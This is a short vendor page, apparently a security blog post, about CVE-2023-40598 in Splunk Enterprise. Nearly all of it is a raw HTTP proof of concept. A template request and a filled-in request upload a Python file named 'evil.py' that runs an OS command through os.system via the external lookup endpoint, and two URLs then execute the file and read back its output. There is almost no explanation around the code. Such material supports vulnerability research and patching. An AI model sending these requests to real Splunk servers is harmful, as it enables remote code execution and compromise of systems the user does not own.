Splunk Enterprise affected by CVE-2023-40598

Kondukto Security Team05 Feb 2024
Unified Vulnerability ManagementAppSecDevSecOps
POST /en-US/splunkd/__raw/servicesNS/nobody/search/lookup/external
HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded
Content-Length: <length>

lookup_external.py&lookup=<file_name>&data=<file_content>
POST /en-US/splunkd/__raw/servicesNS/nobody/search/lookup/external
HTTP/1.1
Host: 192.168.1.100:8000
Content-Type: application/x-www-form-urlencoded
Content-Length: 113

lookup_external.py&lookup=evil.py&data=import+os%0Aos.system%28%27whoami+%3E+output.txt%27%29
<http://192.168.1.100:8000/en-US/splunkd/__raw/servicesNS/nobody/search/lookup/external?lookup=evil.py>
<http://192.168.1.100:8000/en-US/splunkd/__raw/servicesNS/nobody/search/lookup/external?lookup=output.txt>

Get A Demo